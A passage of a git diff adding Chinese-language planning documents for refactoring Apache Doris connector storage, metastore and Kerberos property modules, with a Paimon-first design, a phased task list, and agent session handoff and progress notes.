ctx.executeAuthenticated 内, Kerberos doAs 仍由 fe-core) +``` +连接器只 import `fe-filesystem-api`(StorageProperties 接口)+ `fe-connector-metastore-api/spi`,**零 fe-core / 零 fe-property / 零 fe-filesystem-spi**。 + +### 2.2 BE scan(静态凭据)数据流 +``` +连接器 (PaimonScanPlanProvider): + for sp in ctx.getStorageProperties(): + awsMap = sp.toBackendProperties().orElseThrow().toMap() // AWS_* —— fe-filesystem-api 已有 + 把 awsMap 写进 scan range 的 location 属性 (String map, 交给 BE) +fe-core/BE: 由 AWS_* map 组装 TS3StorageParam(thrift 仍在 fe-core S3-RPC 适配层, api 不见 thrift) +``` +→ 取代现有的 `ConnectorContext.getBackendStorageProperties()` 回调(连接器现在自己用 typed 对象算 BE map)。 + +### 2.3 Vended creds(REST/DLF 动态、读时)与 URI 归一化 +- **Vended creds 边界(D-008)**:明确两段—— + - **「抽取」= 连接器职责(SDK 特定)**:token 在读时从活的引擎 SDK 表对象提取,是**任意形状**(`s3.*`/`oss.*`…)。paimon **已落地**于 `PaimonScanPlanProvider.extractVendedToken(table)`(port 自 legacy `PaimonVendedCredentialsProvider.extractRawVendedCredentials`)。后续各连接器各写各的抽取,fe-core 旧 `Paimon/IcebergVendedCredentialsProvider` 随迁移正式下沉(本次不删,D-005)。 + - **「归一」= fe-core 单点(通用)**:raw-token → 统一 BE map 仍走 `ConnectorContext.vendStorageCredentials(rawToken)`:`filterCloudStorageProperties` + `StorageProperties.createAll`(provider **重新绑定**、派生 region/endpoint/后端调优默认)+ `getBackendPropertiesFromStorageMap` → `AWS_*`。这是 api 接口做不到的(需 ServiceLoader 发现 providers);连接器按 D-003 只见 fe-filesystem-api、无 providers,故归一**必须**留 fe-core 单点(无漂移)。**备选**(连接器依赖 fe-filesystem-spi 自做端到端)被否:加重连接器 + 破红线。 +- **URI 归一化**(`oss://`/`cos://` → BE 规范 `s3://`):保持 `ConnectorContext.normalizeStorageUri(...)`(依赖 fe-core `LocationPath`);**可选后续**下沉到 fe-filesystem。 +- **thrift `TS3StorageParam` / `ObjectStoreInfoPB`**:永久留 fe-core(api 是 RPC-neutral)。 + +> 即:**静态、CREATE-CATALOG 时即可定的 → 走 typed `StorageProperties`(连接器自算);动态/RPC/需 provider 发现的 → 留 `ConnectorContext` 委托 fe-core。** 这是决策③「混合」的精确边界。 + +--- + +## 3. 新 SPI/API 设计 + +### 3.1 `fe-connector-metastore-api`(纯契约,依赖 fe-foundation + fe-filesystem-api) + +镜像 `fe-filesystem-api` 的瘦接口风格,**只暴露中立的 Map / 标量 facts,不暴露 `HiveConf`/Hadoop/SDK 类型**(HiveConf 的实体装配在连接器侧,连接器有 hive-shade)。 + +```java +package org.apache.doris.connector.metastore; + +/** 各连接器自持的、已绑定校验的 metastore 连接属性的公共契约(对标 fe-filesystem 的 StorageProperties)。 */ +public interface MetaStoreProperties { + String providerName(); // 字符串标识 "HMS"/"DLF"/"GLUE"/"REST"/"JDBC"/"FILESYSTEM"(D-006,非枚举) + // ── 横切行为用「能力方法」表达,取代 per-backend 枚举上的 switch(D-006)── + default boolean needsStorage() { return false; } // FileSystem/DLF 需要 storageList;HMS/REST/JDBC 不需要(§1.4) + default boolean needsVendedCredentials() { return false; } // 取代 VendedCredentialsFactory:61 的 getType() switch + default void validate() {} + Map rawProperties(); + Map matchedProperties(); // @ConnectorProperty 实际命中的别名子集 +} + +/** HMS 后端的中立连接事实(HiveConf 实体由连接器组装)。 */ +public interface HmsMetaStoreProperties extends MetaStoreProperties { + String getUri(); + AuthType getAuthType(); // SIMPLE / KERBEROS + /** hive.* / hadoop.security.* / sasl 等中立键,连接器叠到自己的 HiveConf 上。 */ + Map toHiveConfOverrides(); + /** Kerberos 事实(principal/keytab),真正的 UGI.doAs 仍由 ConnectorContext.executeAuthenticated 执行。 */ + Optional kerberos(); +} +public interface DlfMetaStoreProperties extends MetaStoreProperties { Map toDlfCatalogConf(); /* 8×dlf.catalog.* */ } +public interface RestMetaStoreProperties extends MetaStoreProperties { String getUri(); Map toRestOptions(); } +public interface JdbcMetaStoreProperties extends MetaStoreProperties { String getUri(); String getUser(); String getPassword(); String getDriverUrl(); String getDriverClass(); } +public interface GlueMetaStoreProperties extends MetaStoreProperties { Map toGlueConf(); } +public interface FileSystemMetaStoreProperties extends MetaStoreProperties { String getWarehouse(); } +``` + +> 设计要点:与 fe-filesystem-api 完全一致的「瘦接口 + 中立 Map 转换」原则——**不把 hive-conf/hadoop/各引擎 SDK 类型泄进 api**,从而 REST/JDBC-only 的连接器不会被迫拖 hive 依赖。 + +### 3.2 `fe-connector-metastore-spi`(共享 fact 解析器,依赖 metastore-api + fe-foundation + fe-filesystem-api)—— 决策② + +每个后端**一个**解析器,吃 `(rawMap, List)`,产出对应的 `*MetaStoreProperties` facts。`@ConnectorProperty` 绑定(决策④)使别名优先级/required/sensitive/matched 全部免费——**消灭 paimon 的 `String[]` 手抄别名数组**。 + +```java +package org.apache.doris.connector.metastore.spi; + +/** HMS 连接事实解析器(共享)。Hive/Iceberg/Paimon 的 HMS adapter 都调它一次。 */ +public final class HmsMetastoreBackend { + // 内部用 @ConnectorProperty 注解的 typed holder + ConnectorPropertiesUtils.bindConnectorProperties + public static HmsMetaStoreProperties parse(Map raw, List storage); +} +public final class DlfMetastoreBackend { public static DlfMetaStoreProperties parse(Map raw, List storage); } // 含 endpoint-from-region 推导 + 8 key +public final class GlueMetastoreBackend { public static GlueMetaStoreProperties parse(Map raw); } // 含 AssumeRole provider 链 +public final class RestMetastoreBackend { public static RestMetaStoreProperties parse(Map raw); } +public final class JdbcMetastoreBackend { public static JdbcMetaStoreProperties parse(Map raw, Map env); } // 含 resolveDriverUrl + DriverShim +public final class JdbcDriverSupport { /* registerJdbcDriver + DRIVER_CLASS_LOADER_CACHE + DriverShim —— 现在只存一份 */ } +``` + +**后端发现/派发 = Provider 自识别 + ServiceLoader(D-006,镜像 `FileSystemProvider`)**——取代旧 `MetastoreProperties.Type` 枚举 + 中心 switch。每个后端一个 provider(薄壳,包住上面对应的 `*MetastoreBackend.parse`),经 `META-INF/services` 注册;连接器调一次注册表即可,**不再 `switch (flavor)`**: + +```java +package org.apache.doris.connector.metastore.spi; + +/** 后端发现 SPI。新增后端 = 新 provider + 一行 META-INF/services,api/spi 零改动、无中心 switch。 */ +public interface MetaStoreProvider

      extends PluginFactory { + boolean supports(Map props); // 自识别(读 metastore.type/特征键),cheap & 确定性 + P bind(Map props, List storage); // 命中后绑定(内部调对应 *MetastoreBackend.parse) + @Override default String name() { return getClass().getSimpleName().replace("MetaStoreProvider", ""); } +} +// 内置 provider(各自 META-INF/services/...MetaStoreProvider 注册一行): +// HmsMetaStoreProvider / DlfMetaStoreProvider / RestMetaStoreProvider / JdbcMetaStoreProvider / FileSystemMetaStoreProvider +// 后续 Glue/S3Tables:新建 GlueMetaStoreProvider + 一行 services —— 不动 api/spi 既有代码。 + +/** 连接器/fe-core 调它派发,循环 providers 找首个 supports() 命中(对标 FileSystemPluginManager.createFileSystem)。 */ +public final class MetaStoreProviders { + public static MetaStoreProperties bind(Map raw, List storage); +} +``` + +`@ConnectorProperty` typed holder 示例(消灭手抄别名): +```java +final class HmsRawProps { + @ConnectorProperty(names = {"hive.metastore.uris", "uri"}, required = true) String uri; + @ConnectorProperty(names = {"hive.metastore.authentication.type"}, required = false) String authType = "none"; + @ConnectorProperty(names = {"hive.metastore.client.principal"}, required = false) String principal = ""; + @ConnectorProperty(names = {"hive.metastore.client.keytab"}, required = false, sensitive = true) String keytab = ""; + // ConnectorPropertiesUtils.bindConnectorProperties(this, raw) 完成绑定 + matchedProperties +} +``` + +> **shared vs format 切割线**:spi 解析器只产出「**连接事实**」(uri/auth/8-key/driver/warehouse/中立 hive.* map);「**建哪个 SDK 的 catalog**」是引擎特定,留在各连接器的 adapter。`hive.conf.resources` 文件加载、Kerberos `doAs` 仍经 `ConnectorContext` 由 fe-core 执行(连接器不能 import fe-core)。 + +### 3.3 连接器侧 adapter(以 paimon 为例,薄) + +`PaimonCatalogFactory` 从「627 行手抄」瘦身为「provider 派发拿 facts + 组装 paimon Options/HiveConf」。metastore 后端由 `MetaStoreProviders.bind` 经 `supports()` 自动选中(D-006,**无 per-backend 枚举 switch**);剩下的 `instanceof`/`providerName` 分支是**连接器本地**的「建哪个 paimon SDK catalog」(引擎特定、允许): +```java +MetaStoreProperties ms = MetaStoreProviders.bind(raw, storageList); // 共享 + ServiceLoader 自识别派发 +if (ms instanceof HmsMetaStoreProperties hms) { // 连接器本地分支(非 api 枚举) + HiveConf hc = new HiveConf(); + ctx.loadHiveConfResources(raw.get("hive.conf.resources")).forEach(hc::set); // fe-core 加载文件 + hms.toHiveConfOverrides().forEach(hc::set); // 共享 facts + for (StorageProperties sp : storageList) // fe-filesystem-api + sp.toHadoopProperties().ifPresent(h -> h.toHadoopConfigurationMap().forEach(hc::set)); + return createPaimonHiveCatalog(buildPaimonOptions(raw, hms), hc); // paimon 特定(薄) +} +// else if (ms instanceof RestMetaStoreProperties ...) / DlfMetaStoreProperties / ... +``` +hive/iceberg 后续迁移时复用同一批 provider/`*MetastoreBackend.parse`,只写各自 `createXxxCatalog` —— **HMS/DLF/JDBC 连接逻辑不再重抄第 3、4 遍**。 + +### 3.4 fe-core 侧改动 +- **新增**:CREATE CATALOG 时绑定 `List`(fe-filesystem 全量)并经 `ConnectorContext.getStorageProperties()` 下发。 +- **保留**:`DefaultConnectorContext` 的 `vendStorageCredentials` / `normalizeStorageUri` / `loadHiveConfResources` / `executeAuthenticated`(动态/RPC/特权步骤)。 +- **保留/迁移**:`S3Properties.getS3TStorageParam`/`getObjStoreInfoPB` 这类 thrift/proto 适配,迁到 fe-core 的一个 BE-RPC adapter(吃 `BackendStorageProperties.toMap()` 的中立 map);**api 永不见 thrift**。 + +### 3.5 Kerberos 收口到独立叶子模块 `fe-kerberos`(D-007) + +**现状(三处实现,须去重)** +| 位置 | 内容 | 谁用 | +|---|---|---| +| `fe-common` `org.apache.doris.common.security.authentication.*` | 完整套件:`AuthenticationConfig`/`KerberosAuthenticationConfig`/`HadoopAuthenticator`/`HadoopKerberosAuthenticator`/`HadoopSimpleAuthenticator`/`ExecutionAuthenticator`/`PreExecutionAuthenticator(Cache)`/`ImpersonatingHadoopAuthenticator` | fe-core(HMS `HMSBaseProperties`、`HdfsProperties`、注入 `ConnectorContext.executeAuthenticated`) | +| `fe-filesystem-hdfs` `org.apache.doris.filesystem.hdfs.KerberosHadoopAuthenticator` | **自抄一份**(实现 fe-filesystem-spi **另一个** `HadoopAuthenticator` 接口,用 `IOCallable` 而非 `PrivilegedExceptionAction`),为避免依赖 fe-common | fe-filesystem-hdfs(`DFSFileSystem`/`HdfsInputFile`) | +| `fe-connector-paimon` `PaimonCatalogFactory.buildHmsHiveConf` | **手抄** HMS 的 kerberos 条件 HiveConf 键(`sasl.enabled`、service principal、`auth_to_local`)+ doAs 回调 `ctx.executeAuthenticated` | paimon | + +→ 同一段 UGI 登录/刷新/JVM-全局 `UGI.setConfiguration` 锁逻辑散在三处,改一处要改三处(fe-filesystem-hdfs 那份是约一年前拷贝,TGT 刷新可能已漂移)。 + +**目标:新建叶子模块 `fe-kerberos`** +- 依赖**仅** `hadoop-auth` / `hadoop-common`(把唯一外部依赖 trino `KerberosTicketUtils` 用 JDK `javax.security.auth.kerberos` 等价替换,做到零外部依赖)。auth 类现有 import 已很干净(JDK/hadoop/log4j/commons/guava + 1 trino),fe-common 不依赖 fe-core → 抽取无阻力。 +- 把 fe-common `security.authentication.*` 整套**搬入 `fe-kerberos`** 作唯一真相源;fe-common 重新 export(或转依赖 fe-kerberos),fe-core 无感。 +- `fe-filesystem-hdfs` **删自有 `KerberosHadoopAuthenticator`**,改依赖 `fe-kerberos`;**统一**两个打架的 `HadoopAuthenticator` 接口(`PrivilegedExceptionAction` vs `IOCallable`)为单接口 + 消费侧 adapter。 +- 连接器(paimon HMS)的 kerberos facts(principal/keytab/auth_to_local)由 `fe-kerberos` 的 `KerberosAuthSpec` 承载;真正的 `UGI.doAs` 仍经 `ConnectorContext.executeAuthenticated` 由 fe-core 执行(连接器不能 import fe-core;§5 不变量 4)。 + +**依赖图位置**:`fe-kerberos` 与 `fe-foundation` 平级做**纯叶子**(仅 hadoop),被 `fe-common`/`fe-core`/`fe-filesystem-hdfs`/`fe-connector-*` 共用,无环(见 §0 依赖图)。**不**折进 `fe-foundation`(它是零-hadoop 的 `@ConnectorProperty` 纯叶子,不应被 hadoop 污染)。 + +**范围(与 §0.1 / D-005):分两步(见 §4 Phase 3 与 tasks P3)** +- **(a) P3a,本次做(用户 2026-06-17 确认纳入)**:建顶层叶子 `fe-kerberos`(additive)+ 让 paimon 的 HMS kerberos facts 走它(**不碰** fe-common/fe-filesystem-hdfs 既有路径)→ 仍符合 D-005「只动 paimon + 纯新增」。过渡期 fe-common/fe-filesystem-hdfs 各自副本暂留(计数不增:paimon 手抄被 fe-kerberos 取代),由 (b) 收口。 +- **(b) P3b,follow-up(本次不做)**:全量去重(删 fe-filesystem-hdfs 副本、fe-common 重指向 fe-kerberos、统一两个 `HadoopAuthenticator` 接口),与 hive/iceberg 迁移同批——此步会改 fe-common + fe-filesystem-hdfs,超出 D-005,故独立。 + +--- + +## 4. 实施步骤(有序 TODO,paimon 优先、分阶段) + +> 原则:每步独立可编译可测、可单独提交;先建能力、再切 paimon、最后删 fe-core(待 hive/hudi/iceberg 也迁完)。 + +### Phase 0 — 准备 +- [ ] **P0-1(DV-001 修订)** 在 `fe-filesystem-api` 确认连接器所需的**消费**侧 api:`StorageProperties.toHadoopProperties().toHadoopConfigurationMap()`(已存)、`toBackendProperties().toMap()`(已存)。**结论**:消费侧 api 已够(覆盖 paimon 现 fe-property 路的常见静态凭据键,fe-filesystem 为新事实源、较 fe-property 略**超集**:S3 assume-role/anon 额外键 + OSS/COS/OBS endpoint/region 无条件 vs 懒发;T1 钉常见路径全等 + 记超集)。**但绑定侧缺口**:仓内无 raw map → `List` 聚合入口(`FileSystemProvider.bind` 在,但 registry 私有、仅首个命中 `createFileSystem`)→ 需在 fe-core 加 `bindAll`(见 P0-2 / D-009)。~~无需新增静态门面~~(消费侧确无需;绑定侧需 bindAll)。 +- [ ] **P0-2(DV-001/D-009 修订)** fe-core `FileSystemPluginManager` 新增 additive `public List bindAll(Map)`(镜像 `createFileSystem` 的 provider 循环,但 `provider.bind(props)` 全量收集所有 `supports()` 命中者,而非首个命中 `create`);`DefaultConnectorContext.getStorageProperties()` 调它(raw map 经现有 `storagePropertiesSupplier` 值的 `getOrigProps()` 取,**不改构造点** `PluginDrivenExternalCatalog`)。**fe-filesystem 模块零改动、fe-core 旧 `datasource.property.storage` 包零改动。** +- [ ] **P0-3** `tools/check-connector-imports.sh`:当前 FORBIDDEN 不含 `property`/`foundation`,**本次不收紧**(避免破坏性改动;fe-property 物理删除与 gate 收紧均属后续任务)。Phase 1 完成后 paimon 已零 `org.apache.doris.property` import,可作为后续收紧的前置条件。 + +### Phase 1 — paimon 的 Storage 改走 fe-filesystem-api(决策③,纯新增/迁移,不删 fe-core) +- [ ] **P1-1** `fe-connector-spi`:`ConnectorContext` 新增 `default List getStorageProperties() { return List.of(); }`(返回 **fe-filesystem-api** 类型)→ 引入 `fe-connector-spi → fe-filesystem-api` 边(**这条边即「fe-connector 依赖 fe-filesystem-api」的落地**)。**纯新增**,默认空实现,其它连接器不受影响。 +- [ ] **P1-2** fe-core `DefaultConnectorContext.getStorageProperties()`:用 fe-filesystem(全量 + providers)绑定 `StorageProperties` 并返回。**作用域限定到 plugin-driven(paimon)catalog 路径**,不改 hive/iceberg 现有引擎绑定;fe-core 旧 `datasource.property.storage` 类**原样保留**(仍服务 hive/hudi/iceberg)。 +- [ ] **P1-3** paimon `PaimonCatalogFactory.applyStorageConfig`:把 `fe-property StorageProperties.buildObjectStorageHadoopConfig(props)` 替换为「遍历 `ctx.getStorageProperties()` 调 `toHadoopProperties().toHadoopConfigurationMap()`」;保留其后的 `paimon.*/fs./dfs./hadoop.` 覆盖块(**last-write-wins 顺序不变**,否则会 clobber 用户 fs.s3a./kerberos 键——有历史 bug 注释为证)。 +- [ ] **P1-4** paimon `PaimonScanPlanProvider`:BE 静态凭据从 `ctx.getBackendStorageProperties()` 切到「遍历 `getStorageProperties()` 调 `toBackendProperties().toMap()`」(vended 动态路径不动,仍走 `ctx.vendStorageCredentials`)。 +- [ ] **P1-5** 移除 paimon pom 的 `fe-property` 依赖与 `PaimonCatalogFactory:20` 的 import;paimon 模块 `grep` 应零 `org.apache.doris.property`。**至此「fe-connector 不再依赖旧 storage-property 模型」达成。** fe-property 模块本身**不在本次删除**(其唯一消费者是 paimon,断开后变为孤儿 0 消费者,物理删除留待后续任务)。 +- [ ] **P1-6** 验证:paimon UT 全绿 + docker `enablePaimonTest=true`(5 flavor)+ 新旧 Hadoop/BE map 等价性测试(见 §5 T1)。 + +### Phase 2 — MetaStore Property SPI 建模 + paimon adapter 改造(决策①②④,纯新增/迁移,不删 fe-core) +- [ ] **P2-1** 新建 `fe-connector-metastore-api`(依赖 fe-foundation + fe-filesystem-api):`MetaStoreProperties`(`String providerName()` + 能力方法 `needsStorage()`/`needsVendedCredentials()`,**无 per-backend `MetaStoreType` 枚举**,D-006)+ 后端子接口(§3.1)。**本次只定义 paimon 用到的后端**:HMS / DLF / REST / JDBC / FileSystem;Glue / S3Tables(iceberg/hive 专用)**不在本次实现**,留接口可扩展即可。 +- [ ] **P2-2** 新建 `fe-connector-metastore-spi`(依赖 metastore-api + fe-foundation + fe-filesystem-api):`Hms/Dlf/Rest/Jdbc/FileSystem MetastoreBackend.parse(...)` + `JdbcDriverSupport` + **`MetaStoreProvider

      ` SPI(`supports()` 自识别)+ 5 内置 provider + `META-INF/services` + `MetaStoreProviders.bind` 派发**(§3.2,D-006),用 `@ConnectorProperty` typed holder 绑定。**来源 = 上移 paimon 现有 `PaimonCatalogFactory` 里已经手抄的连接逻辑**(它本就是 fe-core `HMSBaseProperties`/`AliyunDLFBaseProperties` 等的 port),做去 fe-core 化整理(HiveConf→中立 map、authenticator→`KerberosAuthSpec` facts)。**fe-core 的 `HMSBaseProperties` 等对应类一律保持不动**(仍服务 hive/hudi/iceberg)。 +- [ ] **P2-3** paimon adapter 改造:`PaimonCatalogFactory` 的 `buildHmsHiveConf`/`buildDlfHiveConf`/`validate`/别名常量 → 改为调用共享 `*MetastoreBackend.parse` + 薄 paimon Options/HiveConf 组装(§3.3)。删(连接器内部的)`PaimonConnectorProperties` 别名数组,由 spi typed holder 取代——**这是连接器自身代码,不属于 fe-core**。 +- [ ] **P2-4** paimon pom 增 `fe-connector-metastore-api/spi` 依赖;`grep` 确认 paimon 无 fe-core import;CI gate 通过。 +- [ ] **P2-5** 验证:paimon UT + docker 5 flavor(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS;与 fe-core 旧 `Paimon*MetaStoreProperties` 行为对照(HiveConf key 集、ParamRules 报错文案一致,见 §5 T2)。 + +> **fe-core 旧 `datasource.property.metastore` 包在本次全程保持不动。** paimon 切换后这些类对 paimon 路径成为 dead code(`PaimonExternalCatalog` 旧路径),但仍被 hive/hudi/iceberg 使用,故**不删**。 + +### 范围外(后续独立任务,本次不做) +- hive / hudi / iceberg 连接器迁移到本 SPI:各写薄 adapter 复用 `*MetastoreBackend.parse` + `getStorageProperties()`,并补齐 Glue / S3Tables / REST-oauth2-sigv4 等后端。 +- 全部连接器迁完后:从 fe-core **彻底删除** `datasource.property.storage` 与 `datasource.property.metastore` 两个包、删 `StoragePropertiesConverter` 等桥;物理删除 `fe-property` 模块(`fe/pom.xml` module/version + 目录)并收紧 import gate 禁 `org.apache.doris.property`。 + +--- + +## 5. 关键不变量 / 风险 / 测试 + +**必须保留的不变量** +1. **正交组合**:metastore 不持有 storage 字段;storage 作入参传入(§1.4)。新 `parse(raw, storageList)` 维持此形态。 +2. **storage 叠加顺序**:canonical 翻译在前、`paimon.*/fs./dfs./hadoop.` 覆盖在后(last-write-wins)。P1-3 必须保序。 +3. **HMS Kerberos 条件键**:`hive.metastore.sasl.enabled` + `hadoop.security.authentication=kerberos` 的分支、service principal、`auth_to_local` 必须在 storage 叠加**之后**施加(否则被 raw `hadoop.*` passthrough clobber——已知 bug)。 +4. **特权/RPC 留 fe-core**:Kerberos `doAs`、`hive.conf.resources` 文件加载、vended 绑定、`TS3StorageParam`/`ObjectStoreInfoPB` 全部经 `ConnectorContext`/fe-core,连接器零 fe-core import(CI gate 强制)。 + +**风险** +- **R1 等价性漂移**:新 `toHadoopConfigurationMap()`/`toBackendProperties().toMap()` 与旧 `getHadoopStorageConfig()`/`getBackendConfigProperties()` 的 key/value 必须逐一对齐(注意默认调优值已分叉:S3=50/3000/1000 vs OSS/COS/OBS=100/10000/10000)。 +- **R2 双路径并存窗口**:Phase 1/2 期间 fe-core 旧 storage(hive/hudi/iceberg 用)与 fe-filesystem 新 storage(paimon 用)并存;同一 catalog 不能两路推出不同配置——paimon 已完全切到新路即可隔离。 +- **R3 打包/类加载**:HMS/DLF 活连接需 relocated thrift(`fe-connector-paimon-hive-shade`)build-order 在前 + child-first hadoop/aws bundling,重构模块时不可破坏(有历史 S3A/thrift 跨 loader cast bug)。 + +**测试(决策驱动,强制)** +- **T1 新旧等价性**:对 S3/OSS/COS/OBS/Azure/HDFS 代表输入,断言新 `toHadoopConfigurationMap()` / `toBackendProperties().toMap()` 与 fe-core 旧产物 key/value 全等(含默认调优值)。这是切换的回归闸(背景报告指出当前**缺**此测试)。 +- **T2 metastore facts 等价性**:对 HMS(simple/kerberos)、DLF(endpoint-from-region)、REST、JDBC、filesystem,断言共享 `*MetastoreBackend.parse` 产出的中立 map 与 fe-core 旧 `Paimon*MetaStoreProperties` 一致(含 ParamRules 报错文案)。 +- **T3 依赖图守门**:ArchUnit/CI gate 断言 `fe-connector-*` 不 import `org.apache.doris.{catalog,common,datasource,qe,...}`,且 Phase 1 后追加禁 `org.apache.doris.property`;`fe-filesystem-*` 不 import fe-core/fe-connector。 +- **T4 端到端**:docker `enablePaimonTest=true` 跑 paimon 5 flavor(filesystem/hms/rest/jdbc/dlf)读 + vended(REST/DLF) + Kerberos HMS。 + +--- + +## 6. 验收标准(本次任务) +1. paimon 连接器零 `org.apache.doris.property`、零 `org.apache.doris.datasource`、零 fe-core import;仅依赖 `fe-connector-{api,spi,metastore-api,metastore-spi}` + `fe-filesystem-api` + `fe-thrift(provided)` + SDK。 +2. `fe-property` 变为 **0 消费者**(孤儿模块,**本次不物理删除**);import gate **未收紧**(保持现状)。 +3. paimon 用到的 HMS/DLF/REST/JDBC/FileSystem 连接逻辑在 `fe-connector-metastore-spi` 各存**一份**;paimon adapter 不再含手抄连接逻辑。 +4. T1–T4 全绿;docker paimon 5 flavor 通过。 +5. 依赖边落地:`fe-connector → 仅 fe-filesystem-api`,`fe-filesystem ↛ fe-connector/fe-core`。 +6. **零改动核对**:fe-core 的 `datasource.property.storage` / `datasource.property.metastore` 两个包,以及 hive/hudi/iceberg/es/jdbc/mc/trino 连接器,本次**未被修改**(`git diff` 应不含这些路径,除 P1-2 的 `DefaultConnectorContext` 新增方法外不动 fe-core property 包)。 +7. (范围外、后续)全连接器迁完后再删 fe-core 两包 + 物理删 fe-property + 收紧 gate。 + +--- + +## 附录 A — 关键事实独立核验(grep) +| 论断 | 结果 | +|---|---| +| paimon 连接器对 fe-core 的 import 数 | **0**(唯一存储 import 是 fe-property `property.storage.StorageProperties`) | +| BE thrift/proto 适配器位置 | **仅** `fe-core/.../storage/S3Properties.java`(`getS3TStorageParam`/`getObjStoreInfoPB`) | +| fe-core 是否已依赖 fe-connector | **是**(`fe-connector-api` + `fe-connector-spi`) | +| fe-core 是否依赖 fe-property | **否** | +| import gate 禁止/允许 | 禁 `catalog|common|datasource|qe|analysis|nereids|planner`;允许 `thrift`/`filesystem`;**未禁** `property`/`foundation` | +| paimon/iceberg per-backend 模块 | 当前分支为 **stale 空目录**;真实拆分在 `catalog-spi-v20260422`,且是 **buildCatalog SPI** 而非 metastore-property SPI | +| fe-core metastore 包规模 | 28 文件 ~3624 LOC;共享后端基类 `HMSBaseProperties`/`AliyunDLFBaseProperties`/`AWSGlueMetaStoreBaseProperties` 已存在 | + +*本方案基于 commit `70e934d` 工作区;docker/e2e 未运行;属设计与可实施步骤层面。实施前请按本工作流(research-design-workflow)批准 TODO 列表。* diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md new file mode 100644 index 00000000000000..c8776cea174bd5 --- /dev/null +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -0,0 +1,36 @@ +# HANDOFF — Session 间接力(每次 session 结束覆盖) + +> 下次 agent 接手:先读 `PROGRESS.md` → 本文件 → `WORKFLOW.md` → (如指定 task)`tasks.md` 对应块 → 一句话复述确认 → 用户确认后开始。 + +--- + +**更新时间**:2026-06-17(设计补充 session:D-006/7/8) +**更新人**:Claude(3 设计点定稿 session) + +## 这次 session 完成了什么 +1. 用户提的 **3 个设计讨论点**经 3-agent recon + 直读复核后定稿,记为 **D-006 / D-007 / D-008**: + - **D-006**:MetaStore 后端用 `MetaStoreProvider.supports()` 自识别 + ServiceLoader(镜像 `FileSystemProvider`),`fe-connector-metastore-api` **不放** `MetaStoreType` 枚举;标识用 `String providerName()` + 能力方法。 + - **D-007**:Kerberos 抽**顶层中立叶子 `fe-kerberos`**(**否决** `fe-connector-auth`——会破 `fe-filesystem↛fe-connector` gate + fe-common 层级倒挂)。**P3a(paimon-local)纳入本次**、**P3b(全量去重)= follow-up 范围外**(均用户 2026-06-17 确认);模块名定 **`fe-kerberos`**。 + - **D-008**:vended creds 边界=连接器只「抽取」(paimon 已落地 `extractVendedToken`)、fe-core 单点「归一」(`vendStorageCredentials`)——**现状已符合**,无新增 task。 +2. 同步更新:设计文档(§0 表 + 依赖图 + §2.3 + §3.1 + §3.2 + §3.3 + 新增 §3.5)、decisions-log(D-006/7/8)、tasks(P2-T01/T02 改写 + 新增 P3a/P3b)、PROGRESS。 + +## 当前状态 +- 阶段:Research ✅ / Design ✅(**9 决策 D-001..D-009**)/ **Implement 🚧 进行中**。 +- **范围已获批(2026-06-17 用户确认)= P0 + P1(storage 收口),做到 P1-T06 gate 停**。 +- **P0-T01 ✅**(recon + 定向)→ **DV-001 / D-009**:缺 bind-all 入口,定机制 A(fe-core `FileSystemPluginManager.bindAll` + `getStorageProperties()` 经 `getOrigProps()`,白名单 +`FileSystemPluginManager.java`)。 +- **下一个:P0-T02**(实现 `FileSystemPluginManager.bindAll`,TDD)+ `P1-T01`(ConnectorContext 默认方法,可并行)。 +- 代码 commit:尚无(P0-T01 仅 plan-doc)。 + +## 下一步(明确) +1. **等待用户批准 `tasks.md`(14 task,含 P3a)** 后进入 Implement。 +2. 获批后从 **P1-T01**(`ConnectorContext.getStorageProperties()`)开始;`P0-T01/T02` 可并行。Kerberos `fe-kerberos`(P3a-T01)依赖 P2-T02。 +3. 严格按 `WORKFLOW.md §2` 单任务循环。 + +## 未决 / 需用户确认 +- ~~P3a 是否纳入本次~~ → **已确认纳入**(2026-06-17)。~~模块名~~ → **定 `fe-kerberos`**。 +- `P1-T02` 是本项目**唯一**的 fe-core 改动(`DefaultConnectorContext` 新增 `getStorageProperties()`,限 paimon 路径、不碰 property 包)。用户已倾向接受。 +- ⚠️ **红线扩展**:P3a 新增 `fe-kerberos` 顶层模块属本次合法改动;但 fe-common / fe-filesystem-hdfs 的既有 kerberos 路径**本次零改动**(P3b follow-up)——提交前 `git diff` 须确认未碰这两处。 + +## 红线提醒(WORKFLOW §4) +- 只动:metastore-api/spi(新建)、paimon、ConnectorContext(仅新增)、DefaultConnectorContext(仅新增)、相关 pom、本跟踪目录。 +- 禁碰:fe-core `datasource.property.{storage,metastore}` 包、其它连接器、fe-property 删除。 diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md new file mode 100644 index 00000000000000..9e978075a9b1a3 --- /dev/null +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -0,0 +1,43 @@ +# PROGRESS — 属性体系重构(paimon 优先) + +> 人类 + agent 入口。每完成 task / 阶段切换 / 重要变更后更新。上次更新:**2026-06-17**。 + +--- + +## 总体状态 + +| 阶段 | 进度 | 状态 | +|---|---|---| +| Research(调研) | ██████████ 100% | ✅ 完成(8-agent + grep;+ 3-agent recon 复核 D-006/7/8) | +| Design(设计) | ██████████ 100% | ✅ 完成(设计文档 + **7 决策** D-001..D-008,范围已收窄) | +| **Implement(实现)** | █░░░░░░░░░ ~7% | 🚧 **进行中**(范围 P0+P1 已获批;P0-T01 ✅) | + +任务计数:**1 / 14** 完成(P0: 1/2 | P1: 0/6 | P2: 0/5 | **P3a: 0/1**)| + **P3b**(全量去重 follow-up,范围外占位)。 + +--- + +## 当前活跃 task +- **下一个:`P0-T02`**(fe-core `FileSystemPluginManager.bindAll`,D-009)+ `P1-T01`(ConnectorContext.getStorageProperties 默认方法,可并行)。 +- P0-T01 ✅ 已完成(recon + 定向):见下「待决」与 DV-001/D-009。 + +## 阻塞 / 待决 +- ✅ 范围已获批(2026-06-17)= **P0+P1(storage 收口),做到 P1-T06 gate 停**。 +- ✅ **DV-001/D-009(2026-06-17)**:P0-T01 recon 证伪「fe-filesystem-api 已够、唯一 fe-core 改动」——产出 fe-filesystem typed StorageProperties 须新增 bind-all(仓内不存在)。用户定 **机制 A**:fe-core `FileSystemPluginManager` 加 additive `bindAll`,`getStorageProperties()` 经 `getOrigProps()` 取 raw map、不碰构造点。**fe-core 改动 = 2 